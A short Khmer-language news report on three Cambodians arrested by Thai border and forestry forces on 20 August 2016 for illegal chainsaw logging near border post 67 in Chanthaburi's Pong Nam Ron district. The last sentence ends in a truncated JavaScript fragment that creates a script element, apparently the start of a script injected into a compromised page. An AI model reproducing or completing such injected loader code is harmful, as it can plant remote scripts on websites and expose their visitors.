ឃាត់ខ្លួនជនជាតិខ្មែរ៣នាក់ចូលកាប់ឈើខុសច្បាប់នៅតំបន់ហាមឃាត់
បាត់ដំបងៈ ប្រភពព័ត៌មានពីជាយដែនបានអោយដឹងថា មនុស្សចំនួន៣នាក់ដែលបានចូលកាប់ឈឺើខុសច្បាប់ លើទឹកដីថៃត្រង់ចំណុចហាមឃាត់ ត្រូវបានឃាត់ខ្លួនដោយក្រុមតម្រួតថៃ សហការនិងកំលាំងរដ្ឋបាលព្រៃឈើ ខណៈដែលពួកគេកំពុងធ្វើសកម្មភាពប្រើប្រាស់រណាយន្តអារឈើ នៅចំណុចបង្គោលព្រំដែនលេខ ៦៧ ក្នុងភូមិសាស្ត្រ ស្រុកពោងណាំរ៉ន ខេត្តច័ន្ទបុរីប្រទេសថៃ ។
ប្រភពដដែលបានអោយដឹងទៀតថា នៅព្រឹកថ្ងៃទី២០ ខែសីហា ឆ្នាំ២០១៦ កន្លងទៅថ្មីៗនេះ កំលាំងវរៈការពារព្រំដែន បានសហការជាមួយកំលាំងរដ្ឋបាលព្រៃឈើ និងកំលាំងស្ថានីយ៍តម្រួត នៃអធិការដ្ឋាន ពោងណាំរ៉ន បានចេញប្រតិបត្តិការទៅកាន់ទីតាំងខាងលើ ព្រមទាំងបានឮសម្លេងរណាយន្ត រំពងពេញព្រៃ ទើបធ្វើការឡោមព័ទ្ធដោយស្ទាក់ចាប់បានជនជាតិខ្មែរចំនួន ៣នាក់ ព្រមទាំងដកហូតបាននូវរណាយន្តជាច្រើនគ្រឿងផងដែរ ដែលជាវត្ថុតាងប្រព្រឹត្តបទល្មើស ។
ក្រោយការឃាត់ខ្លួន កំលាំងចំរុះបានប្រគល់ជនជាតិខ្មែរទាំងនោះ ទៅអោយកំលាំងអធិការដ្ឋាន ស្រុកពោងណាំរ៉ន នាំខ្លួនយកទៅសាកសួរបន្ត ដើម្បីចាត់បញ្ជូនតាមផ្លូវ។var d=document;var s=d.createElement(‘script’);